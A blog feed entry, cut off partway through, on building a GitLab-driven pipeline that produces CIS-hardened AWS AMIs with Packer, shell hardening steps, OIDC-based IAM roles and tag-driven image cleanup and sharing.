<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://rosesecurity.cloud/feed.xml" rel="self" type="application/atom+xml" /><link href="https://rosesecurity.cloud/" rel="alternate" type="text/html" /><updated>2026-06-08T05:47:32+00:00</updated><id>https://rosesecurity.cloud/feed.xml</id><title type="html">rosecurity@cloud</title><subtitle>i make the terraform which is like when you terraform mars but for computers and i write go lang which is google language for going fast and i maintain modules which are like modular furniture but for the cloud which is where data lives in the sky and i do machine learning pipelines which is when the machine learns about pipes and i build ML platforms which stands for machine learning but also could be maximum likelihood or maybe municipal library anyway its scalable which means it can scale like a fish but in the cloud which is AWS or AZURE or google cloud which is where the googles live i live in the CLI which is command line interface but also could be clitoris but no its the terminal which is like the airport but for commands and i created red teaming which is when you team up with red people to hack the mainframe and im a mitre contributor which is the hat that bishops wear but for security and OWASP which is when you get wasped by a OWL and debian which is like saying damn but with a B i write blogs which are like logs but for the web and if you enjoy my code which is community code because its for the community please reach out and connect which is what we do on linkedin which is the professional facebook but with more people lying about their skills anyway thanks for reading this is my bio and i hope you like it and please hire me or give me money or stars on github which are like real stars but smaller and on a website</subtitle><entry><title type="html">Building an AWS Image Factory with Packer and 
Terratest</title><link href="https://rosesecurity.cloud/2026/05/20/building-an-image-factory.html" rel="alternate" type="text/html" title="Building an AWS Image Factory with Packer and Terratest" /><published>2026-05-20T00:00:00+00:00</published><updated>2026-05-20T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2026/05/20/building-an-image-factory</id><content type="html" xml:base="https://rosesecurity.cloud/2026/05/20/building-an-image-factory.html"><![CDATA[<p>Sorry I’ve been quiet lately. My head has been down on my newest adventure. I’m so used to being the sole operator, platform engineer, SRE, or whatever that day brings that it’s odd to take a step back and be tasked with providing enterprise cybersecurity for cloud environments that other teams are operating. I’ve had so many cool new projects that will make for some great technical blogs, so I figured I would start with this one. The idea is simple: how do you provide your organization with hardened operating systems that teams can actually deploy into the cloud? A lot of compliance terms and frameworks get tossed around, but the vision is this: how do you provide an image factory of CIS-hardened AMIs, bake in a custom baseline of tools, and share those images across numerous AWS accounts and organizations?</p>

<p>Here is my approach, the pitfalls, the unknowns, and the fun parts. I apologize in advance that the CI/CD is very GitLab-centric, but if you like the design, feel free to port it over to your source control system of choice.</p>

<h2 id="scaffolding">Scaffolding</h2>

<p>The repository starts with the boring stuff first, because the boring stuff is what keeps the project usable after the first week. Besides <code class="language-plaintext highlighter-rouge">.gitignore</code> and <code class="language-plaintext highlighter-rouge">.gitattributes</code>, there is a short <code class="language-plaintext highlighter-rouge">README.md</code>, a <code class="language-plaintext highlighter-rouge">Brewfile</code> for local tooling, an <code class="language-plaintext highlighter-rouge">.editorconfig</code>, a <code class="language-plaintext highlighter-rouge">SECURITY.md</code>, and the usual <code class="language-plaintext highlighter-rouge">.gitlab/merge_request_templates</code> and <code class="language-plaintext highlighter-rouge">.gitlab/issue_templates</code> so reviews and issues don’t turn into archaeology.</p>

<p>A small <code class="language-plaintext highlighter-rouge">Makefile</code> covers common local commands, but <code class="language-plaintext highlighter-rouge">.pre-commit-config.yaml</code> does most of the early heavy lifting. It gives the repo one place for file hygiene, formatting checks, and basic guardrails before anything gets near CI. Here’s the first pass of hooks for the Image Factory.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># See https://pre-commit.com for more information</span>
<span class="c1"># See https://pre-commit.com/hooks.html for more hooks</span>
<span class="na">repos</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">repo</span><span class="pi">:</span> <span class="s">https://github.com/pre-commit/pre-commit-hooks</span>
    <span class="na">rev</span><span class="pi">:</span> <span class="s">v5.0.0</span>
    <span class="na">hooks</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">end-of-file-fixer</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">check-merge-conflict</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">trailing-whitespace</span>
        <span class="na">args</span><span class="pi">:</span> <span class="pi">[</span><span class="nv">--markdown-linebreak-ext=md</span><span class="pi">]</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">check-shebang-scripts-are-executable</span>

      <span class="c1"># YAML</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">check-yaml</span>

      <span class="c1"># Cross platform</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">check-case-conflict</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">mixed-line-ending</span>
        <span class="na">args</span><span class="pi">:</span> <span class="pi">[</span><span class="nv">--fix=lf</span><span class="pi">]</span>

  <span class="pi">-</span> <span class="na">repo</span><span class="pi">:</span> <span class="s">local</span>
    <span class="na">hooks</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">packer-fmt</span>
        <span class="na">name</span><span class="pi">:</span> <span class="s">Packer format check</span>
        <span class="na">entry</span><span class="pi">:</span> <span class="s">packer fmt -check -recursive packer</span>
        <span class="na">language</span><span class="pi">:</span> <span class="s">system</span>
        <span class="na">files</span><span class="pi">:</span> <span class="s">^packer/.*\.pkr\.hcl$</span>
        <span class="na">pass_filenames</span><span class="pi">:</span> <span class="kc">false</span>

      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">shellcheck</span>
        <span class="na">name</span><span class="pi">:</span> <span class="s">ShellCheck</span>
        <span class="na">entry</span><span class="pi">:</span> <span class="s">shellcheck</span>
        <span class="na">language</span><span class="pi">:</span> <span class="s">system</span>
        <span class="na">types</span><span class="pi">:</span> <span class="pi">[</span><span class="nv">shell</span><span class="pi">]</span>
</code></pre></div></div>

<p>That runs on every commit and removes a lot of pointless review noise. If Packer formatting or shell linting is broken, I want the hook to catch it before a reviewer has to.</p>

<blockquote>
  <p>Side note: I typically run a dedicated <code class="language-plaintext highlighter-rouge">pre-commit</code> CI job so that everything has to pass before any other pipeline starts.</p>
</blockquote>

<p>The repo also has a <code class="language-plaintext highlighter-rouge">docs</code> directory for the usual odds and ends: architecture notes, decision records, and diagrams.</p>

<h2 id="aws-prerequisites">AWS Prerequisites</h2>

<p>Before the repo can build anything useful, AWS needs a few pieces in place. If the AMIs use encrypted EBS volumes, the KMS key policy has to let the build account use the key and let consumer accounts launch from the shared AMIs. You also need the normal network plumbing: VPC, subnets, routing, security groups, and outbound access so temporary build and test instances can pull updates, download packages, reach SSM, and install whatever baseline tooling your organization requires.</p>

<p>An optional AMI reaper Lambda is worth adding early. Failed builds, superseded images, and half-finished experiments shouldn’t live forever. If the pipeline tags images during build, test, and publish, cleanup can be driven from those tags instead of guessing (thank you boto3).</p>
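
<p>A rough sketch of that tag-driven selection, written against the AWS CLI rather than boto3 to keep it short. The 14-day window, the function names, and the choice to target only unpublished images are assumptions for illustration. A real reaper would also deregister the AMI and delete its snapshots.</p>

```shell
#!/bin/sh
# Hypothetical reaper helpers; names and retention window are illustrative.
MAX_AGE_DAYS="${MAX_AGE_DAYS:-14}"

# is_expired CREATED_EPOCH NOW_EPOCH
# Succeeds when the image is at least MAX_AGE_DAYS old.
is_expired() {
  age_days=$(( ($2 - $1) / 86400 ))
  [ "$age_days" -ge "$MAX_AGE_DAYS" ]
}

# list_unpublished_amis
# Prints "ImageId<TAB>CreationDate" for factory-built images that were never
# published, using the tags applied during the Packer build.
list_unpublished_amis() {
  aws ec2 describe-images \
    --owners self \
    --filters "Name=tag:ImageFactoryManaged,Values=true" \
              "Name=tag:ImageFactoryPublished,Values=false" \
    --query 'Images[].[ImageId,CreationDate]' \
    --output text
}
```

<p>Because the selection keys off <code class="language-plaintext highlighter-rouge">ImageFactoryManaged</code> and <code class="language-plaintext highlighter-rouge">ImageFactoryPublished</code>, images created outside the factory are never candidates for cleanup.</p>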

<p>The last prerequisite is identity. Packer, Terratest, and publishing should each have an IAM role, and CI should use OIDC to assume those roles. Long-lived AWS keys in CI variables are one of those things that feel convenient right up until they become an incident, and they make me feel like I need a shower if I have to use them.</p>
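
<p>A minimal sketch of the OIDC handoff, assuming the CI job exposes its ID token in a variable (called <code class="language-plaintext highlighter-rouge">GITLAB_OIDC_TOKEN</code> here) and the role ARN in <code class="language-plaintext highlighter-rouge">PACKER_ROLE_ARN</code>. Both names and the <code class="language-plaintext highlighter-rouge">configure_oidc</code> helper are placeholders. It leans on the standard <code class="language-plaintext highlighter-rouge">AWS_ROLE_ARN</code> and <code class="language-plaintext highlighter-rouge">AWS_WEB_IDENTITY_TOKEN_FILE</code> environment variables, which the AWS CLI and SDKs use to call <code class="language-plaintext highlighter-rouge">AssumeRoleWithWebIdentity</code> on their own.</p>

```shell
#!/bin/sh
# configure_oidc ROLE_ARN ID_TOKEN [SESSION_NAME]
# Writes the CI-issued ID token to a private temp file and points the AWS
# web identity credential provider at it. No long-lived keys are involved.
configure_oidc() {
  token_file="$(mktemp)" || return 1
  chmod 600 "$token_file"
  printf '%s' "$2" > "$token_file"

  export AWS_ROLE_ARN="$1"
  export AWS_WEB_IDENTITY_TOKEN_FILE="$token_file"
  export AWS_ROLE_SESSION_NAME="${3:-image-factory}"
}

# Example (placeholder variable names):
#   configure_oidc "$PACKER_ROLE_ARN" "$GITLAB_OIDC_TOKEN" "packer-$CI_PIPELINE_ID"
#   aws sts get-caller-identity
```

<p>Calling it once per job with a different role ARN is one way to keep the Packer, Terratest, and publishing roles separate.</p>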

<h2 id="codebase-structure">Codebase Structure</h2>

<p>The layout is intentionally boring. Each image gets its own Packer root under <code class="language-plaintext highlighter-rouge">packer/images/&lt;provider&gt;/&lt;image&gt;</code>, and each root owns the same four files: <code class="language-plaintext highlighter-rouge">versions.pkr.hcl</code>, <code class="language-plaintext highlighter-rouge">variables.pkr.hcl</code>, <code class="language-plaintext highlighter-rouge">sources.pkr.hcl</code>, and <code class="language-plaintext highlighter-rouge">build.pkr.hcl</code>. When someone adds another operating system, the plugin versions, inputs, AMI lookup logic, and hardening steps all have a known place to live.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">├── account-map.yaml
├── Brewfile
├── docs
├── Makefile
├── packer
│   ├── images
│   │   └── aws
│   │       ├── al2023
│   │       │   ├── build.pkr.hcl
│   │       │   ├── sources.pkr.hcl
│   │       │   ├── variables.pkr.hcl
│   │       │   └── versions.pkr.hcl
│   │       └── ubuntu24.04
│   │           ├── build.pkr.hcl
│   │           ├── sources.pkr.hcl
│   │           ├── variables.pkr.hcl
│   │           └── versions.pkr.hcl
├── README.md
├── scripts
│   ├── build.sh
│   └── gitlab
│       └── detect-packer-changes.sh
├── SECURITY.md
└── tests
    ├── terraform
    │   ├── main.tf
    │   ├── outputs.tf
    │   ├── providers.tf
    │   ├── README.md
    │   ├── variables.tf
    │   └── versions.tf
    └── terratest
        ├── build_test.go
        ├── checks
        │   ├── al2023-cis-level1.yaml
        │   └── ubuntu24.04-cis-level1.yaml
        ├── go.mod
        └── go.sum
</span></code></pre></div></div>

<p>The other important root-level file is <code class="language-plaintext highlighter-rouge">account-map.yaml</code>. It lists the consumer AWS accounts that should receive launch permissions after an AMI passes testing. I prefer keeping that as data in the repo instead of hiding it in CI variables. A merge request should show exactly who is being added to or removed from the distribution list.</p>
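
<p>The layout of <code class="language-plaintext highlighter-rouge">account-map.yaml</code> isn’t shown here, so this sketch takes the account IDs as plain arguments and only illustrates the publishing call. The function names are hypothetical; the <code class="language-plaintext highlighter-rouge">--launch-permission</code> shorthand is the standard AWS CLI form.</p>

```shell
#!/bin/sh
# launch_permission_arg ACCOUNT_ID...
# Builds the shorthand value for --launch-permission, for example:
#   Add=[{UserId=111111111111},{UserId=222222222222}]
launch_permission_arg() {
  entries=""
  for account in "$@"; do
    entries="${entries:+$entries,}{UserId=$account}"
  done
  printf 'Add=[%s]' "$entries"
}

# share_ami AMI_ID ACCOUNT_ID...
# Grants launch permission on one AMI to each consumer account.
share_ami() {
  ami_id="$1"
  shift
  aws ec2 modify-image-attribute \
    --image-id "$ami_id" \
    --launch-permission "$(launch_permission_arg "$@")"
}
```

<p>For encrypted AMIs, launch permission alone is not enough: the consumer accounts still need access to the KMS key, as covered in the prerequisites.</p>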

<h2 id="building-the-image">Building the Image</h2>

<p>The build wrapper stays small. It takes a Packer environment through <code class="language-plaintext highlighter-rouge">PKR_ENV</code>, initializes that image root, checks formatting, validates the template, and runs the build, which leaves the final manifest in <code class="language-plaintext highlighter-rouge">artifacts/</code>. The local command and the CI command are the same thing, which makes build failures much easier to reproduce.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/usr/bin/env bash</span>

<span class="nb">set</span> <span class="nt">-euo</span> pipefail

: <span class="s2">"</span><span class="k">${</span><span class="nv">PKR_ENV</span>:?<span class="p"> PKR_ENV is required</span><span class="k">}</span><span class="s2">"</span>
<span class="k">if</span> <span class="o">!</span> <span class="nb">command</span> <span class="nt">-v</span> <span class="s2">"packer"</span> &amp;&gt;/dev/null<span class="p">;</span> <span class="k">then
  </span><span class="nb">echo</span> <span class="s2">"Error: Packer is not installed."</span>
  <span class="nb">exit </span>1
<span class="k">fi

</span><span class="nb">echo</span> <span class="s2">"Initializing Packer environment in </span><span class="nv">$PKR_ENV</span><span class="s2">"</span>
packer init <span class="s2">"</span><span class="nv">$PKR_ENV</span><span class="s2">"</span>

<span class="nb">echo</span> <span class="s2">"Checking Packer configuration formatting..."</span>
packer <span class="nb">fmt</span> <span class="nt">-check</span> <span class="s2">"</span><span class="nv">$PKR_ENV</span><span class="s2">"</span>

<span class="nb">echo</span> <span class="s2">"Validating Packer configurations..."</span>
packer validate <span class="s2">"</span><span class="nv">$PKR_ENV</span><span class="s2">"</span>

<span class="nb">echo</span> <span class="s2">"Building Packer image..."</span>
<span class="nb">mkdir</span> <span class="nt">-p</span> artifacts
packer build <span class="nt">-on-error</span><span class="o">=</span>cleanup <span class="s2">"</span><span class="nv">$PKR_ENV</span><span class="s2">"</span>
</code></pre></div></div>

<p>For AL2023, the Packer source starts by finding the base AMI, creating a timestamped name, and tagging the AMI and snapshots with enough metadata to make cleanup and audit work sane. Tags like <code class="language-plaintext highlighter-rouge">ImageFactoryManaged</code>, <code class="language-plaintext highlighter-rouge">ImageFactoryPublished</code>, <code class="language-plaintext highlighter-rouge">BaseImageProduct</code>, and <code class="language-plaintext highlighter-rouge">SourceAmi</code> give you a quick answer to what created the image, what it was based on, and whether it has been released.</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">locals</span> <span class="p">{</span>
  <span class="nx">build_timestamp</span> <span class="o">=</span> <span class="nx">regex_replace</span><span class="p">(</span><span class="nx">timestamp</span><span class="p">(),</span> <span class="s2">"[- TZ:]"</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span>
  <span class="nx">cis_product</span>     <span class="o">=</span> <span class="s2">"CIS Hardened Image Level 1 on Amazon Linux 2023"</span>

  <span class="nx">ami_name</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_name</span> <span class="o">!=</span> <span class="s2">""</span> <span class="o">?</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_name</span> <span class="o">:</span> <span class="nx">format</span><span class="p">(</span>
    <span class="s2">"%s-%s-%s"</span><span class="p">,</span>
    <span class="nx">var</span><span class="p">.</span><span class="nx">ami_name_prefix</span><span class="p">,</span>
    <span class="nx">var</span><span class="p">.</span><span class="nx">cis_marketplace_version</span><span class="p">,</span>
    <span class="nx">local</span><span class="p">.</span><span class="nx">build_timestamp</span><span class="p">,</span>
  <span class="p">)</span>

  <span class="nx">common_tags</span> <span class="o">=</span> <span class="nx">merge</span><span class="p">(</span>
    <span class="p">{</span>
      <span class="nx">Name</span>                  <span class="o">=</span> <span class="nx">local</span><span class="p">.</span><span class="nx">ami_name</span>
      <span class="nx">BaseImageProduct</span>      <span class="o">=</span> <span class="nx">local</span><span class="p">.</span><span class="nx">cis_product</span>
      <span class="nx">BaseImageVersion</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">cis_marketplace_version</span>
      <span class="nx">CisBenchmarkLevel</span>     <span class="o">=</span> <span class="s2">"1"</span>
      <span class="nx">ImageFactoryManaged</span>   <span class="o">=</span> <span class="s2">"true"</span>
      <span class="nx">ImageFactoryPublished</span> <span class="o">=</span> <span class="s2">"false"</span>
      <span class="nx">SourceAmi</span>             <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">amazon-ami</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">id</span>
    <span class="p">},</span>
    <span class="nx">var</span><span class="p">.</span><span class="nx">tags</span><span class="p">,</span>
  <span class="p">)</span>
<span class="p">}</span>

<span class="nx">data</span> <span class="s2">"amazon-ami"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">region</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">aws_region</span>
  <span class="nx">owners</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_owners</span>
  <span class="nx">most_recent</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_most_recent</span>

  <span class="nx">filters</span> <span class="o">=</span> <span class="nx">merge</span><span class="p">(</span>
    <span class="p">{</span>
      <span class="nx">architecture</span>        <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_architecture</span>
      <span class="nx">name</span>                <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_name_filter</span>
      <span class="nx">root-device-type</span>    <span class="o">=</span> <span class="s2">"ebs"</span>
      <span class="nx">virtualization-type</span> <span class="o">=</span> <span class="s2">"hvm"</span>
    <span class="p">},</span>
    <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_product_code</span> <span class="o">!=</span> <span class="s2">""</span> <span class="o">?</span> <span class="p">{</span> <span class="nx">product-code</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_product_code</span> <span class="p">}</span> <span class="o">:</span> <span class="p">{},</span>
  <span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>
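
<p>To make the naming concrete: Packer’s <code class="language-plaintext highlighter-rouge">timestamp()</code> returns an RFC 3339 UTC string, and the <code class="language-plaintext highlighter-rouge">regex_replace</code> strips the separators so the result is safe to append to a name. Here is a shell equivalent of the two expressions, with a made-up prefix and version. It does not cover the <code class="language-plaintext highlighter-rouge">var.ami_name</code> override.</p>

```shell
#!/bin/sh
# compact_timestamp RFC3339_UTC
# Mirrors regex_replace(timestamp(), "[- TZ:]", "") from the locals block.
compact_timestamp() {
  printf '%s' "$1" | tr -d 'TZ: -'
}

# ami_name PREFIX VERSION RFC3339_UTC
# Mirrors format("%s-%s-%s", prefix, version, build_timestamp).
ami_name() {
  printf '%s-%s-%s' "$1" "$2" "$(compact_timestamp "$3")"
}

# Illustrative values only.
ami_name "cis-al2023" "1.0.0" "2026-05-20T12:34:56Z"
# prints cis-al2023-1.0.0-20260520123456
```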

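<p>The <code class="language-plaintext highlighter-rouge">amazon-ebs</code> source connects through SSM Session Manager. The communicator itself stays <code class="language-plaintext highlighter-rouge">ssh</code>, but setting <code class="language-plaintext highlighter-rouge">ssh_interface</code> to <code class="language-plaintext highlighter-rouge">session_manager</code> tunnels that SSH session through Session Manager instead of a reachable port. It sounds like a small choice, but it changes the operating model quite a bit. I don’t need to punch SSH ingress into a build subnet, pass key pairs around, or explain why a temporary builder was reachable from the internet. The instance gets temporary SSM permissions, Packer connects through Session Manager, and the build network can stay private.</p>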

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">source</span> <span class="s2">"amazon-ebs"</span> <span class="s2">"al2023"</span> <span class="p">{</span>
  <span class="nx">ami_description</span>             <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_description</span>
  <span class="nx">ami_name</span>                    <span class="o">=</span> <span class="nx">local</span><span class="p">.</span><span class="nx">ami_name</span>
  <span class="nx">ami_regions</span>                 <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_regions</span>
  <span class="nx">associate_public_ip_address</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">associate_public_ip_address</span>
  <span class="nx">encrypt_boot</span>                <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">encrypt_boot</span>
  <span class="nx">instance_type</span>               <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">instance_type</span>
  <span class="nx">kms_key_id</span>                  <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">kms_key_id</span>
  <span class="nx">region</span>                      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">aws_region</span>
  <span class="nx">source_ami</span>                  <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">amazon-ami</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">id</span>

  <span class="nx">communicator</span>     <span class="o">=</span> <span class="s2">"ssh"</span>
  <span class="nx">pause_before_ssm</span> <span class="o">=</span> <span class="s2">"30s"</span>
  <span class="nx">ssh_interface</span>    <span class="o">=</span> <span class="s2">"session_manager"</span>
  <span class="nx">ssh_timeout</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ssh_timeout</span>
  <span class="nx">ssh_username</span>     <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ssh_username</span>

  <span class="nx">launch_block_device_mappings</span> <span class="p">{</span>
    <span class="nx">delete_on_termination</span> <span class="o">=</span> <span class="kc">true</span>
    <span class="nx">device_name</span>           <span class="o">=</span> <span class="s2">"/dev/xvda"</span>
    <span class="nx">encrypted</span>             <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">encrypt_boot</span>
    <span class="nx">kms_key_id</span>            <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">kms_key_id</span>
    <span class="nx">volume_size</span>           <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">root_volume_size</span>
    <span class="nx">volume_type</span>           <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">root_volume_type</span>
  <span class="p">}</span>

  <span class="nx">run_tags</span>      <span class="o">=</span> <span class="nx">merge</span><span class="p">(</span><span class="nx">local</span><span class="p">.</span><span class="nx">common_tags</span><span class="p">,</span> <span class="p">{</span> <span class="nx">ImageFactoryStage</span> <span class="o">=</span> <span class="s2">"build"</span> <span class="p">})</span>
  <span class="nx">snapshot_tags</span> <span class="o">=</span> <span class="nx">local</span><span class="p">.</span><span class="nx">common_tags</span>
  <span class="nx">tags</span>          <span class="o">=</span> <span class="nx">local</span><span class="p">.</span><span class="nx">common_tags</span>
<span class="p">}</span>
</code></pre></div></div>
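
<p>One operational detail worth checking up front: with <code class="language-plaintext highlighter-rouge">ssh_interface = "session_manager"</code>, Packer relies on the AWS Session Manager plugin being installed on the machine that runs the build. Here is a small preflight sketch in the same spirit as the Packer check in the build wrapper. The <code class="language-plaintext highlighter-rouge">require_tools</code> name is hypothetical.</p>

```shell
#!/bin/sh
# require_tools TOOL...
# Reports every missing tool on stderr and fails if any are absent.
require_tools() {
  missing=0
  for tool in "$@"; do
    if ! command -v "$tool" >/dev/null 2>&1; then
      printf 'Error: %s is not installed.\n' "$tool" >&2
      missing=1
    fi
  done
  return "$missing"
}

# Example: fail fast before Packer tries to open a Session Manager tunnel.
#   require_tools packer session-manager-plugin || exit 1
```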

<p>The hardening layer uses shell in this version because the first pass needed to stay readable and close to the AMI lifecycle. This is just an example baseline. In practice, you could start from an AWS Marketplace image that already comes hardened and layer your custom tooling on top. You could also move the hardening logic into Ansible if that fits your team better. The shape is the same either way: install the baseline agent, apply the deltas, enable the services, clean the machine, and seal it.</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">build</span> <span class="p">{</span>
  <span class="nx">sources</span> <span class="o">=</span> <span class="p">[</span><span class="s2">"source.amazon-ebs.al2023"</span><span class="p">]</span>

  <span class="nx">provisioner</span> <span class="s2">"shell"</span> <span class="p">{</span>
    <span class="nx">inline_shebang</span> <span class="o">=</span> <span class="s2">"/bin/bash -e"</span>

    <span class="nx">environment_vars</span> <span class="o">=</span> <span class="p">[</span>
      <span class="s2">"UPDATE_PACKAGES=${var.update_packages}"</span><span class="p">,</span>
    <span class="p">]</span>

    <span class="nx">inline</span> <span class="o">=</span> <span class="p">[</span>
      <span class="s2">"set -euo pipefail"</span><span class="p">,</span>
      <span class="s2">"if [ </span><span class="se">\"</span><span class="s2">$UPDATE_PACKAGES</span><span class="se">\"</span><span class="s2"> = </span><span class="se">\"</span><span class="s2">true</span><span class="se">\"</span><span class="s2"> ]; then sudo dnf update -y; fi"</span><span class="p">,</span>
      <span class="s2">"if ! rpm -q amazon-ssm-agent &gt;/dev/null 2&gt;&amp;1; then sudo dnf install -y amazon-ssm-agent; fi"</span><span class="p">,</span>
      <span class="s2">"if ! rpm -q rsyslog &gt;/dev/null 2&gt;&amp;1; then sudo dnf install -y rsyslog; fi"</span><span class="p">,</span>
      <span class="s2">"printf '%s</span><span class="err">\\</span><span class="s2">n' 'install cramfs /bin/false' 'blacklist cramfs' | sudo tee /etc/modprobe.d/cramfs.conf &gt;/dev/null"</span><span class="p">,</span>
      <span class="s2">"printf '%s</span><span class="err">\\</span><span class="s2">n' 'net.ipv4.conf.all.accept_redirects = 0' 'net.ipv4.conf.default.accept_redirects = 0' | sudo tee /etc/sysctl.d/99-imagefactory-hardening.conf &gt;/dev/null"</span><span class="p">,</span>
      <span class="s2">"sudo sysctl -p /etc/sysctl.d/99-imagefactory-hardening.conf"</span><span class="p">,</span>
      <span class="s2">"sudo mkdir -p /etc/ssh/sshd_config.d"</span><span class="p">,</span>
      <span class="s2">"printf '%s</span><span class="err">\\</span><span class="s2">n' 'PermitRootLogin no' 'PermitEmptyPasswords no' | sudo tee /etc/ssh/sshd_config.d/10-imagefactory-hardening.conf &gt;/dev/null"</span><span class="p">,</span>
      <span class="s2">"sudo chmod 600 /etc/ssh/sshd_config.d/10-imagefactory-hardening.conf"</span><span class="p">,</span>
      <span class="s2">"printf '%s</span><span class="err">\\</span><span class="s2">n' 'umask 027' | sudo tee /etc/profile.d/99-imagefactory-umask.sh &gt;/dev/null"</span><span class="p">,</span>
      <span class="s2">"sudo chmod 644 /etc/profile.d/99-imagefactory-umask.sh"</span><span class="p">,</span>
      <span class="s2">"sudo systemctl enable --now amazon-ssm-agent"</span><span class="p">,</span>
      <span class="s2">"sudo systemctl enable --now rsyslog"</span><span class="p">,</span>
      <span class="s2">"sudo dnf clean all"</span><span class="p">,</span>
      <span class="s2">"sudo cloud-init clean --logs"</span><span class="p">,</span>
      <span class="s2">"sudo rm -f /etc/ssh/ssh_host_*"</span><span class="p">,</span>
    <span class="p">]</span>
  <span class="p">}</span>

  <span class="nx">post-processor</span> <span class="s2">"manifest"</span> <span class="p">{</span>
    <span class="nx">output</span>     <span class="o">=</span> <span class="s2">"artifacts/${var.ami_name_prefix}-manifest.json"</span>
    <span class="nx">strip_path</span> <span class="o">=</span> <span class="kc">true</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
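
<p>Later stages need the AMI ID back out of that manifest. Packer’s Amazon builders record <code class="language-plaintext highlighter-rouge">artifact_id</code> as <code class="language-plaintext highlighter-rouge">region:ami-id</code>, comma-separated when the image is copied to several regions. Here is a sketch of the lookup, with a hypothetical function name and manifest path, and <code class="language-plaintext highlighter-rouge">jq</code> assumed only in the usage comment.</p>

```shell
#!/bin/sh
# ami_for_region ARTIFACT_ID REGION
# Splits "region:ami-id[,region:ami-id...]" and prints the AMI ID for REGION.
# Prints nothing when the region is not present.
ami_for_region() {
  printf '%s\n' "$1" | tr ',' '\n' | while IFS=: read -r region ami; do
    if [ "$region" = "$2" ]; then
      printf '%s\n' "$ami"
    fi
  done
}

# Example, assuming jq is installed and a manifest written by the build above:
#   artifact_id="$(jq -r '.builds[-1].artifact_id' artifacts/example-manifest.json)"
#   ami_for_region "$artifact_id" "us-east-2"
```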

<p>The Ubuntu image follows the same pattern with <code class="language-plaintext highlighter-rouge">apt</code>, <code class="language-plaintext highlighter-rouge">snap</code>, a different username, and a different root device. AL2023 and Ubuntu aren’t identical, but the repo shape is close enough that a reviewer can find the operating-system-specific differences quickly.</p>

<h2 id="build-pipelines">Build Pipelines</h2>

<p>The parent pipeline has three stages: detect, dispatch, and secret detection. The detect job figures out which image roots changed, writes a small matrix artifact, and generates a child pipeline. The dispatch job starts that generated child pipeline. This keeps the parent pipeline fast without using a giant static matrix that rebuilds every image because one line changed in one Packer directory.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">stages</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="s">detect</span>
  <span class="pi">-</span> <span class="s">dispatch</span>
  <span class="pi">-</span> <span class="s">secret-detection</span>

<span class="na">variables</span><span class="pi">:</span>
  <span class="na">SECRET_DETECTION_ENABLED</span><span class="pi">:</span> <span class="s2">"</span><span class="s">true"</span>
  <span class="na">PACKER_VERSION</span><span class="pi">:</span> <span class="s2">"</span><span class="s">1.15.1"</span>
  <span class="na">PACKER_BUILD_IMAGE</span><span class="pi">:</span> <span class="s2">"</span><span class="s">amazonlinux:2023"</span>
  <span class="na">AWS_REGION</span><span class="pi">:</span> <span class="s2">"</span><span class="s">us-east-2"</span>

<span class="na">include</span><span class="pi">:</span>
